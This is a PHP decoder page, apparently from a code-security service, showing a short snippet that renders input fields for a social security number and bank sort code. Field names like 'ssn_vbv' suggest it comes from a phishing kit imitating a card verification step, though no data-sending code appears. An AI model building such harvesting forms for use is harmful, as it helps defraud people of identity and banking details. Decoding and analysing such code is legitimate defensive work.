Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if($ssn) { ?> <tr style="float: left;"> <td align="righ..

Decoded Output download

<?php 
    if($ssn) { 
      ?> 
      <tr style="float: left;"> 
         <td align="right">Social security number :</td> <td><input style="width: 75px;" type="text" placeholder="SSN" name="ssn_vbv"></td><br>       <tr> 
         </tr> 
      </tr> 
      <?php 
    } 
    ?> 
    <?php 
    if($soc) { 
      ?> 
      <tr style="float: left;"> 
         <td align="right">Sort code :</td> <td><input style="width: 75px;" type="text" placeholder="Sort code" name="soc_vbv"></td><br>       <tr> 
         </tr> 
      </tr>

Did this file decode correctly?

Original Code

<?php
    if($ssn) {
      ?>
      <tr style="float: left;">
         <td align="right">Social security number :</td> <td><input style="width: 75px;" type="text" placeholder="SSN" name="ssn_vbv"></td><br>       <tr>
         </tr>
      </tr>
      <?php
    }
    ?>
    <?php
    if($soc) {
      ?>
      <tr style="float: left;">
         <td align="right">Sort code :</td> <td><input style="width: 75px;" type="text" placeholder="Sort code" name="soc_vbv"></td><br>       <tr>
         </tr>
      </tr>

Function Calls

None

Variables

None

Stats

MD5 a3f0c3529f970a6bc22ec4fc388ded98
Eval Count 0
Decode Time 94 ms